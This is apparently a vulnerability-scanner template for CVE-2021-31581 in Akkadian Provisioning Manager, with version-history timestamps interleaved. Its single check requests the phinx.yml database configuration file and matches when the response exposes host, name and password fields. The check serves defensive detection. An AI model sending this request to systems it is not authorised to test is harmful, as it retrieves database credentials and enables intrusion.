2021-07-26 17:18:45 +00:00
id : CVE-2021-31581
info :
2023-02-01 17:45:23 +00:00
name : Akkadian Provisioning Manager - Information Disclosure
2021-07-26 17:18:45 +00:00
author : geeknik
2022-04-22 10:38:41 +00:00
severity : medium
2023-02-01 17:45:23 +00:00
description : Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. This command launches a standard VI editor interface which can then be escaped.
2021-07-26 17:18:45 +00:00
reference :
- https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
- https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
2023-02-01 17:45:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-31581
remediation : This issue was resolved in Akkadian OVA appliance version 3.0 and later, Akkadian Provisioning Manager 5.0.2 and later, and Akkadian Appliance Manager 3.3.0.314-4a349e0 and later.
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 4.4
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-31581
2023-07-11 19:49:27 +00:00
cwe-id : CWE-312,CWE-269
epss-score : 0.00285
cpe : cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : akkadianlabs
product : ova_appliance
tags : cve,cve2021,akkadian,mariadb,disclosure
2021-07-26 17:18:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-26 17:18:45 +00:00
- method : GET
path :
- "{{BaseURL}}/pme/database/pme/phinx.yml"
matchers-condition : and
matchers :
- type : word
words :
- "host:"
- "name:"
- "pass:"
condition : and
2021-08-01 20:38:28 +00:00
2021-08-01 15:59:39 +00:00
- type : word
2023-07-11 19:49:27 +00:00
negative : true
2021-08-01 15:59:39 +00:00
words :
- "html>"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200